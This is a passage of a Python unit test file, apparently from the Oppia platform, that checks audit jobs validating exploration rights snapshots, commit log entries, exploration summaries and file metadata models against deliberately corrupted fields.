exp_models.ExplorationRightsSnapshotContentModel.get_by_id(
'0-1'))
self.model_instance_1 = (
exp_models.ExplorationRightsSnapshotContentModel.get_by_id(
'1-1'))
self.model_instance_2 = (
exp_models.ExplorationRightsSnapshotContentModel.get_by_id(
'2-1'))
self.job_class = (
prod_validation_jobs_one_off
.ExplorationRightsSnapshotContentModelAuditOneOffJob)
def test_standard_operation(self):
expected_output = [
u'[u\'fully-validated ExplorationRightsSnapshotContentModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of ExplorationRightsSnapshotContentModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), (
u'[u\'fully-validated '
'ExplorationRightsSnapshotContentModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
self.model_instance_2.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'ExplorationRightsSnapshotContentModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_exploration_model_failure(self):
exp_models.ExplorationRightsModel.get_by_id('0').delete(
self.owner_id, '', [])
expected_output = [
(
u'[u\'failed validation check for exploration_rights_ids '
'field check of ExplorationRightsSnapshotContentModel\', '
'[u"Entity id 0-1: based on field exploration_rights_ids '
'having value 0, expect model ExplorationRightsModel with '
'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
'exploration_rights_ids having value 0, expect model '
'ExplorationRightsModel with id 0 but it doesn\'t exist"]]'
), (
u'[u\'fully-validated '
'ExplorationRightsSnapshotContentModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_invalid_exploration_version_in_model_id(self):
model_with_invalid_version_in_id = (
exp_models.ExplorationRightsSnapshotContentModel(
id='0-3'))
model_with_invalid_version_in_id.content = {}
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for exploration rights model '
'version check of ExplorationRightsSnapshotContentModel\', '
'[u\'Entity id 0-3: ExplorationRights model corresponding to '
'id 0 has a version 1 which is less than the version 3 in '
'snapshot content model id\']]'
), (
u'[u\'fully-validated ExplorationRightsSnapshotContentModel\', '
'3]')]
run_job_and_check_output(self, expected_output, sort=True)
class ExplorationCommitLogEntryModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(ExplorationCommitLogEntryModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(USER_EMAIL, USER_NAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(3)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
self.rights_model_instance = (
exp_models.ExplorationCommitLogEntryModel(
id='rights-1-1', user_id=self.owner_id,
username=self.OWNER_USERNAME, exploration_id='1',
commit_type='edit', commit_message='', commit_cmds=[],
post_commit_status=constants.ACTIVITY_STATUS_PUBLIC,
post_commit_community_owned=False,
post_commit_is_private=False))
self.rights_model_instance.put()
self.model_instance_0 = (
exp_models.ExplorationCommitLogEntryModel.get_by_id(
'exploration-0-1'))
self.model_instance_1 = (
exp_models.ExplorationCommitLogEntryModel.get_by_id(
'exploration-1-1'))
self.model_instance_2 = (
exp_models.ExplorationCommitLogEntryModel.get_by_id(
'exploration-2-1'))
self.job_class = (
prod_validation_jobs_one_off
.ExplorationCommitLogEntryModelAuditOneOffJob)
def test_standard_operation(self):
exp_services.update_exploration(
self.owner_id, '0', [exp_domain.ExplorationChange({
'cmd': 'edit_exploration_property',
'property_name': 'title',
'new_value': 'New title'
})], 'Changes.')
expected_output = [
u'[u\'fully-validated ExplorationCommitLogEntryModel\', 5]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of ExplorationCommitLogEntryModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), u'[u\'fully-validated ExplorationCommitLogEntryModel\', 3]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
self.model_instance_2.delete()
self.rights_model_instance.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'ExplorationCommitLogEntryModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_exploration_model_failure(self):
exp_models.ExplorationModel.get_by_id('0').delete(
feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for exploration_ids '
'field check of ExplorationCommitLogEntryModel\', '
'[u"Entity id exploration-0-1: based on field '
'exploration_ids having value 0, expect model '
'ExplorationModel with id 0 '
'but it doesn\'t exist", u"Entity id exploration-0-2: based '
'on field exploration_ids having value 0, expect model '
'ExplorationModel with id 0 but it doesn\'t exist"]]'
), u'[u\'fully-validated ExplorationCommitLogEntryModel\', 3]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_exploration_rights_model_failure(self):
exp_models.ExplorationRightsModel.get_by_id('1').delete(
feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for exploration_rights_ids '
'field check of ExplorationCommitLogEntryModel\', '
'[u"Entity id rights-1-1: based on field '
'exploration_rights_ids having value 1, expect model '
'ExplorationRightsModel with id 1 but it doesn\'t exist"]]'
), u'[u\'fully-validated ExplorationCommitLogEntryModel\', 3]']
run_job_and_check_output(
self, expected_output, sort=True)
def test_invalid_exploration_version_in_model_id(self):
model_with_invalid_version_in_id = (
exp_models.ExplorationCommitLogEntryModel.create(
'0', 3, self.owner_id, self.OWNER_USERNAME, 'edit',
'msg', [{}],
constants.ACTIVITY_STATUS_PUBLIC, False))
model_with_invalid_version_in_id.exploration_id = '0'
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for exploration model '
'version check of ExplorationCommitLogEntryModel\', '
'[u\'Entity id %s: Exploration model corresponding '
'to id 0 has a version 1 which is less than '
'the version 3 in commit log entry model id\']]'
) % (model_with_invalid_version_in_id.id),
u'[u\'fully-validated ExplorationCommitLogEntryModel\', 4]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_id(self):
model_with_invalid_id = (
exp_models.ExplorationCommitLogEntryModel(
id='invalid-0-1', user_id=self.owner_id,
username=self.OWNER_USERNAME, commit_type='edit',
commit_message='msg', commit_cmds=[{}],
post_commit_status=constants.ACTIVITY_STATUS_PUBLIC,
post_commit_is_private=False))
model_with_invalid_id.exploration_id = '0'
model_with_invalid_id.put()
expected_output = [
(
u'[u\'failed validation check for model id check of '
'ExplorationCommitLogEntryModel\', '
'[u\'Entity id %s: Entity id does not match regex pattern\']]'
) % (model_with_invalid_id.id), (
u'[u\'failed validation check for commit cmd check of '
'ExplorationCommitLogEntryModel\', [u\'Entity id invalid-0-1: '
'No commit command domain object defined for entity with '
'commands: [{}]\']]'),
u'[u\'fully-validated ExplorationCommitLogEntryModel\', 4]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_commit_type(self):
self.model_instance_0.commit_type = 'invalid'
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for commit type check of '
'ExplorationCommitLogEntryModel\', '
'[u\'Entity id exploration-0-1: Commit type invalid is '
'not allowed\']]'
), u'[u\'fully-validated ExplorationCommitLogEntryModel\', 3]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_post_commit_status(self):
self.model_instance_0.post_commit_status = 'invalid'
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for post commit status check '
'of ExplorationCommitLogEntryModel\', '
'[u\'Entity id exploration-0-1: Post commit status invalid '
'is invalid\']]'
), u'[u\'fully-validated ExplorationCommitLogEntryModel\', 3]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_true_post_commit_is_private(self):
self.model_instance_0.post_commit_status = 'public'
self.model_instance_0.post_commit_is_private = True
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for post commit is private '
'check of ExplorationCommitLogEntryModel\', '
'[u\'Entity id %s: Post commit status is '
'public but post_commit_is_private is True\']]'
) % self.model_instance_0.id,
u'[u\'fully-validated ExplorationCommitLogEntryModel\', 3]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_false_post_commit_is_private(self):
self.model_instance_0.post_commit_status = 'private'
self.model_instance_0.post_commit_is_private = False
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for post commit is private '
'check of ExplorationCommitLogEntryModel\', '
'[u\'Entity id %s: Post commit status is '
'private but post_commit_is_private is False\']]'
) % self.model_instance_0.id,
u'[u\'fully-validated ExplorationCommitLogEntryModel\', 3]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_commit_cmd_schmea(self):
self.model_instance_0.commit_cmds = [{
'cmd': 'add_state'
}, {
'cmd': 'delete_state',
'invalid_attribute': 'invalid'
}]
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for commit cmd '
'delete_state check of '
'ExplorationCommitLogEntryModel\', '
'[u"Entity id exploration-0-1: Commit command domain '
'validation for command: {u\'cmd\': u\'delete_state\', '
'u\'invalid_attribute\': u\'invalid\'} '
'failed with error: The following required attributes '
'are missing: state_name, '
'The following extra attributes are present: '
'invalid_attribute"]]'
), (
u'[u\'failed validation check for commit cmd '
'add_state check of '
'ExplorationCommitLogEntryModel\', '
'[u"Entity id exploration-0-1: Commit command domain '
'validation for command: {u\'cmd\': u\'add_state\'} '
'failed with error: The following required attributes '
'are missing: state_name"]]'
), u'[u\'fully-validated ExplorationCommitLogEntryModel\', 3]']
run_job_and_check_output(self, expected_output, sort=True)
class ExpSummaryModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(ExpSummaryModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(USER_EMAIL, USER_NAME)
self.user_id = self.get_user_id_from_email(USER_EMAIL)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.owner = user_services.UserActionsInfo(self.owner_id)
editor_email = 'user@editor.com'
viewer_email = 'user@viewer.com'
contributor_email = 'user@contributor.com'
self.signup(editor_email, 'editor')
self.signup(viewer_email, 'viewer')
self.signup(contributor_email, 'contributor')
self.editor_id = self.get_user_id_from_email(editor_email)
self.viewer_id = self.get_user_id_from_email(viewer_email)
self.contributor_id = self.get_user_id_from_email(contributor_email)
language_codes = ['ar', 'en', 'en']
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
language_code=language_codes[i]
) for i in xrange(3)]
for exp in explorations:
exp.tags = ['math', 'art']
exp_services.save_new_exploration(self.owner_id, exp)
rights_manager.assign_role_for_exploration(
self.owner, '0', self.editor_id, rights_manager.ROLE_EDITOR)
exp_services.update_exploration(
self.contributor_id, '0', [exp_domain.ExplorationChange({
'cmd': 'edit_exploration_property',
'property_name': 'title',
'new_value': 'New title'
})], 'Changes.')
rights_manager.assign_role_for_exploration(
self.owner, '2', self.viewer_id, rights_manager.ROLE_VIEWER)
rating_services.assign_rating_to_exploration(self.user_id, '0', 3)
rating_services.assign_rating_to_exploration(self.viewer_id, '0', 4)
self.model_instance_0 = exp_models.ExpSummaryModel.get_by_id('0')
self.model_instance_1 = exp_models.ExpSummaryModel.get_by_id('1')
self.model_instance_2 = exp_models.ExpSummaryModel.get_by_id('2')
self.job_class = (
prod_validation_jobs_one_off.ExpSummaryModelAuditOneOffJob)
def test_standard_operation(self):
rights_manager.publish_exploration(self.owner, '0')
exp_services.update_exploration(
self.owner_id, '1', [exp_domain.ExplorationChange({
'cmd': 'edit_exploration_property',
'property_name': 'title',
'new_value': 'New title'
})], 'Changes.')
expected_output = [
u'[u\'fully-validated ExpSummaryModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of ExpSummaryModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
exp_models.ExplorationModel.get_by_id('1').delete(
self.owner_id, '')
exp_models.ExplorationModel.get_by_id('2').delete(
self.owner_id, '')
self.model_instance_1.delete()
self.model_instance_2.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'ExpSummaryModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_first_published_datetime_than_current_time(self):
rights_manager.publish_exploration(self.owner, '0')
rights_manager.publish_exploration(self.owner, '1')
self.model_instance_0 = exp_models.ExpSummaryModel.get_by_id('0')
self.model_instance_0.first_published_msec = (
self.model_instance_0.first_published_msec * 1000000.0)
self.model_instance_0.put()
rights_model = exp_models.ExplorationRightsModel.get_by_id('0')
rights_model.first_published_msec = (
self.model_instance_0.first_published_msec)
rights_model.commit(self.owner_id, '', [])
expected_output = [
(
u'[u\'failed validation check for first published msec check '
'of ExpSummaryModel\', '
'[u\'Entity id 0: The first_published_msec field has a '
'value %s which is greater than the time when the '
'job was run\']]'
) % (self.model_instance_0.first_published_msec),
u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_exploration_model_failure(self):
exp_models.ExplorationModel.get_by_id('0').delete(
feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for exploration_ids '
'field check of ExpSummaryModel\', '
'[u"Entity id 0: based on field exploration_ids having '
'value 0, expect model ExplorationModel with id 0 but '
'it doesn\'t exist"]]'),
u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_owner_user_model_failure(self):
rights_manager.assign_role_for_exploration(
self.owner, '0', self.user_id, rights_manager.ROLE_OWNER)
user_models.UserSettingsModel.get_by_id(self.user_id).delete()
expected_output = [
(
u'[u\'failed validation check for owner_user_ids '
'field check of ExpSummaryModel\', '
'[u"Entity id 0: based on field owner_user_ids having '
'value %s, expect model UserSettingsModel with id %s '
'but it doesn\'t exist"]]') % (self.user_id, self.user_id),
u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_editor_user_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.editor_id).delete()
expected_output = [
(
u'[u\'failed validation check for editor_user_ids '
'field check of ExpSummaryModel\', '
'[u"Entity id 0: based on field editor_user_ids having '
'value %s, expect model UserSettingsModel with id %s but '
'it doesn\'t exist"]]') % (
self.editor_id, self.editor_id),
u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_viewer_user_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.viewer_id).delete()
expected_output = [
(
u'[u\'failed validation check for viewer_user_ids '
'field check of ExpSummaryModel\', '
'[u"Entity id 2: based on field viewer_user_ids having '
'value %s, expect model UserSettingsModel with id %s but '
'it doesn\'t exist"]]') % (
self.viewer_id, self.viewer_id),
u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_contributor_user_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.contributor_id).delete()
expected_output = [
(
u'[u\'failed validation check for contributor_user_ids '
'field check of ExpSummaryModel\', '
'[u"Entity id 0: based on field contributor_user_ids having '
'value %s, expect model UserSettingsModel with id %s but '
'it doesn\'t exist"]]') % (
self.contributor_id, self.contributor_id),
u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_exploration_model_last_updated(self):
last_human_update_time = (
self.model_instance_0.exploration_model_last_updated)
self.model_instance_0.exploration_model_last_updated = (
datetime.datetime.utcnow() + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for exploration model last '
'updated check of ExpSummaryModel\', '
'[u\'Entity id %s: The exploration_model_last_updated '
'field: %s does not match the last time a commit was '
'made by a human contributor: %s\']]'
) % (
self.model_instance_0.id,
self.model_instance_0.exploration_model_last_updated,
last_human_update_time),
u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_schema(self):
self.model_instance_0.ratings = {'10': 4, '5': 15}
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for domain object check of '
'ExpSummaryModel\', '
'[u\'Entity id 0: Entity fails domain validation with '
'the error Expected ratings to have keys: 1, 2, 3, 4, 5, '
'received 10, 5\']]'
), u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_contributors_summary(self):
sorted_contributor_ids = sorted(
self.model_instance_0.contributors_summary.keys())
self.model_instance_0.contributors_summary = {'invalid': 1}
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for contributors summary '
'check of ExpSummaryModel\', '
'[u"Entity id 0: Contributor ids: [u\'%s\', u\'%s\'] '
'do not match the contributor ids obtained using '
'contributors summary: [u\'invalid\']"]]') % (
sorted_contributor_ids[0], sorted_contributor_ids[1]
),
u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_exploration_related_property(self):
self.model_instance_0.title = 'invalid'
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for title field check of '
'ExpSummaryModel\', '
'[u\'Entity id %s: title field in entity: invalid does not '
'match corresponding exploration title field: New title\']]'
) % self.model_instance_0.id,
u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_exploration_rights_related_property(self):
self.model_instance_0.status = 'public'
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for status field check of '
'ExpSummaryModel\', '
'[u\'Entity id %s: status field in entity: public does not '
'match corresponding exploration rights status field: '
'private\']]'
) % self.model_instance_0.id,
u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
class FileMetadataModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(FileMetadataModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'exp%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(2)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
self.model_instance_0 = file_models.FileMetadataModel.create(
'exploration/exp0', 'assets/image/img0.png')
self.model_instance_0.commit(self.owner_id, [])
self.model_instance_1 = file_models.FileMetadataModel.create(
'exploration/exp1', '/exploration/exp1/assets/audio/aud1.mp3')
self.model_instance_1.commit(self.owner_id, [])
self.job_class = (
prod_validation_jobs_one_off.FileMetadataModelAuditOneOffJob)
def test_standard_operation(self):
expected_output = [
u'[u\'fully-validated FileMetadataModel\', 2]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.commit(feconf.SYSTEM_COMMITTER_ID, [])
expected_output = [
(
u'[u\'failed validation check for time field relation check '
'of FileMetadataModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
),
u'[u\'fully-validated FileMetadataModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
expected_output = [(
u'[u\'failed validation check for current time check of '
'FileMetadataModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_exploration_model_failure(self):
exp_models.ExplorationModel.get_by_id('exp1').delete(
feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for exploration_ids field '
'check of FileMetadataModel\', '
'[u"Entity id %s: based on field exploration_ids having '
'value exp1, expect model ExplorationModel with id exp1 but it '
'doesn\'t exist"]]') % self.model_instance_1.id,
u'[u\'fully-validated FileMetadataModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_snapshot_metadata_model_failure(self):
file_models.FileMetadataSnapshotMetadataModel.get_by_id(
'%s-1' % self.model_instance_0.id).delete()
expected_output = [
(
u'[u\'failed validation check for snapshot_metadata_ids '
'field check of FileMetadataModel\', '
'[u"Entity id %s: based on field snapshot_metadata_ids '
'having value %s-1, expect model '
'FileMetadataSnapshotMetadataModel '
'with id %s-1 but it doesn\'t exist"]]') % (
self.model_instance_0.id, self.model_instance_0.id,
self.model_instance_0.id),
u'[u\'fully-validated FileMetadataModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_snapshot_content_model_failure(self):
file_models.FileMetadataSnapshotContentModel.get_by_id(
'%s-1' % self.model_instance_0.id).delete()
expected_output = [
(
u'[u\'failed validation check for snapshot_content_ids '
'field check of FileMetadataModel\', '
'[u"Entity id %s: based on field snapshot_content_ids having '
'value %s-1, expect model FileMetadataSnapshotContentModel '
'with id %s-1 but it doesn\'t exist"]]') % (
self.model_instance_0.id, self.model_instance_0.id,
self.model_instance_0.id),
u'[u\'fully-validated FileMetadataModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
class FileMetadataSnapshotMetadataModelValidatorTests(
test_utils.GenericTestBase):
def setUp(self):
super(FileMetadataSnapshotMetadataModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(USER_EMAIL, USER_NAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.user_id = self.get_user_id_from_email(USER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'exp%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(2)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
file_metadata_model_0 = file_models.FileMetadataModel.create(
'exploration/exp0', 'assets/image/img0.png')
file_metadata_model_0.commit(self.owner_id, [])
file_metadata_model_1 = file_models.FileMetadataModel.create(
'exploration/exp1', '/exploration/exp1/assets/audio/aud1.mp3')
file_metadata_model_1.commit(self.user_id, [])
self.id_0 = file_metadata_model_0.id
self.id_1 = file_metadata_model_1.id
self.model_instance_0 = (
file_models.FileMetadataSnapshotMetadataModel.get_by_id(
'%s-1' % self.id_0))
self.model_instance_1 = (
file_models.FileMetadataSnapshotMetadataModel.get_by_id(
'%s-1' % self.id_1))
self.job_class = (
prod_validation_jobs_one_off
.FileMetadataSnapshotMetadataModelAuditOneOffJob)
def test_standard_operation(self):
expected_output = [
u'[u\'fully-validated FileMetadataSnapshotMetadataModel\', 2]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of FileMetadataSnapshotMetadataModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), (
u'[u\'fully-validated '
'FileMetadataSnapshotMetadataModel\', 1]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'FileMetadataSnapshotMetadataModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_file_metadata_model_failure(self):
file_models.FileMetadataModel.get_by_id(self.id_0).delete(
self.owner_id, '', [])
expected_output = [
(
u'[u\'failed validation check for file_metadata_ids '
'field check of FileMetadataSnapshotMetadataModel\', '
'[u"Entity id %s-1: based on field file_metadata_ids '
'having value %s, expect model FileMetadataModel with '
'id %s but it doesn\'t exist", u"Entity id %s-2: based on '
'field file_metadata_ids having value %s, expect model '
'FileMetadataModel with id %s but it doesn\'t exist"]]'
) % (
self.id_0, self.id_0, self.id_0, self.id_0,
self.id_0, self.id_0
),
u'[u\'fully-validated FileMetadataSnapshotMetadataModel\', 1]']
run_job_and_check_output(
self, expected_output, literal_eval=True)
def test_missing_committer_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.user_id).delete()
expected_output = [
(
u'[u\'failed validation check for committer_ids field '
'check of FileMetadataSnapshotMetadataModel\', '
'[u"Entity id %s-1: based on field committer_ids having '
'value %s, expect model UserSettingsModel with id %s '
'but it doesn\'t exist"]]'
) % (self.id_1, self.user_id, self.user_id), (
u'[u\'fully-validated '
'FileMetadataSnapshotMetadataModel\', 1]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_invalid_file_metadata_version_in_model_id(self):
model_with_invalid_version_in_id = (
file_models.FileMetadataSnapshotMetadataModel(
id='%s-3' % self.id_0, committer_id=self.owner_id,
commit_type='edit', commit_message='msg', commit_cmds=[{}]))
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for file metadata model '
'version check of FileMetadataSnapshotMetadataModel\', '
'[u\'Entity id %s-3: FileMetadata model corresponding to '
'id %s has a version 1 which is less than the version 3 in '
'snapshot metadata model id\']]'
) % (self.id_0, self.id_0), (
u'[u\'fully-validated FileMetadataSnapshotMetadataModel\', '
'2]')]
run_job_and_check_output(self, expected_output, sort=True)
class FileMetadataSnapshotContentModelValidatorTests(
test_utils.GenericTestBase):
def setUp(self):
super(FileMetadataSnapshotContentModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'exp%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(2)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
file_metadata_model_0 = file_models.FileMetadataModel.create(
'exploration/exp0', 'assets/image/img0.png')
file_metadata_model_0.commit(self.owner_id, [])
file_metadata_model_1 = file_models.FileMetadataModel.create(
'exploration/exp1', '/exploration/exp1/assets/audio/aud1.mp3')
file_metadata_model_1.commit(self.owner_id, [])
self.id_0 = file_metadata_model_0.id
self.id_1 = file_metadata_model_1.id
self.model_instance_0 = (
file_models.FileMetadataSnapshotContentModel.get_by_id(
'%s-1' % self.id_0))
self.model_instance_1 = (
file_models.FileMetadataSnapshotContentModel.get_by_id(
'%s-1' % self.id_1))
self.job_class = (
prod_validation_jobs_one_off
.FileMetadataSnapshotContentModelAuditOneOffJob)
def test_standard_operation(self):
expected_output = [
u'[u\'fully-validated FileMetadataSnapshotContentModel\', 2]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of FileMetadataSnapshotContentModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), (
u'[u\'fully-validated '
'FileMetadataSnapshotContentModel\', 1]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
expected_output = [(
